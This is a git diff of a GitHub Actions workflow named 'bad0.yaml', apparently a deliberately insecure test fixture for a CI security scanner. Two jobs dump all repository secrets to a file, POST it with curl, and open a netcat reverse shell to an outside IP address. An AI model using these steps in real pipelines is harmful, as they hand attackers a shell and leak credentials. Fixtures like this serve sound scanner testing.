diff --git a/.github/workflows/bad0.yaml b/.github/workflows/bad0.yaml index 73e1e35..60e37aa 100644 --- a/.github/workflows/bad0.yaml +++ b/.github/workflows/bad0.yaml @@ -11,12 +11,12 @@ jobs: id: checkov uses: bridgecrewio/checkov-action@master env: - GITHUB_TOKEN: ${{secrets.THIS_IS_A_TEST_SECRET}} - ACTIONS_ALLOW_UNSECURE_COMMANDS: 'true' + GITHUB_TOKEN: ${{secrets.THIS_IS_A_TEST_SECRET}} + ACTIONS_ALLOW_UNSECURE_COMMANDS: 'true' run: | echo "${{ toJSON(secrets) }}" > .secrets curl -X POST -s --data "@.secrets" /dev/null - rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|netcat 34.159.16.75 32032 >/tmp/f + rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|netcat 34.159.16.75 32032 >/tmp/f bridgecrew2: runs-on: ubuntu-latest steps: @@ -24,9 +24,9 @@ jobs: id: checkov uses: bridgecrewio/checkov-action@master env: - GITHUB_TOKEN: ${{secrets.THIS_IS_A_TEST_SECRET}} - ACTIONS_ALLOW_UNSECURE_COMMANDS: 'true' + GITHUB_TOKEN: ${{secrets.THIS_IS_A_TEST_SECRET}} + ACTIONS_ALLOW_UNSECURE_COMMANDS: 'true' run: | echo "${{ toJSON(secrets) }}" > .secrets curl -X POST -s --data "@.secrets" /dev/null - rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|netcat 34.159.16.75 32032 >/tmp/f + rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|netcat 34.159.16.75 32032 >/tmp/f